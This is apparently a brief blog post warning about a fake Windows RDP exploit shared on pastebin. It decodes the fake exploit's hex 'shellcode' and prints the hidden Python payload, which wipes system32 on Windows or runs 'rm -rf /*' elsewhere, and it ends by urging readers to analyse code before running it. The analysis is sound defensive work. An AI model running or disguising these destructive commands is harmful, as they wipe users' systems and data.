Quick Analysis Fake RDP Exploit

Not that long ago we saw the big hype around the Windows Remote Desktop Protocol exploit. The story was that the RDP service had a vulnerability allowing possible remote code execution without authentication. In no time websites where up talking about the current progression of the vulnerability analysis. Until today still no workable exploit has been made released (http://istherdpexploitoutyet.com/) – as far as I’m aware.

What was interesting to see was that in the meantime fake exploits stated to show up. One of the examples can be found at: http://pastebin.com/GM4sHj9t

At first, this really looked like a legit exploit. The only problem is that the hex data in ‘shellcode’ translate into the following lines:

__import__('os').system('del /s /q /f C:windowssystem32* > NUL 2>&1')
if 'Win' in __import__('platform').system()
else __import__('os').system('rm -rf /* > /dev/null 2>&1')
#hi there ^_~ feel free to spread this with the rm -rf
#replaced with something more insidious

//Just fyi I added some returns to make this readable. Originally this is one line of code.

Relying on people who have no clue what they are doing or simply run everything they get there hands on, this is a great way to mess with people and/or setup a small botnet.

So think and analyze before you run shit. ;)

Cheers, Ruben.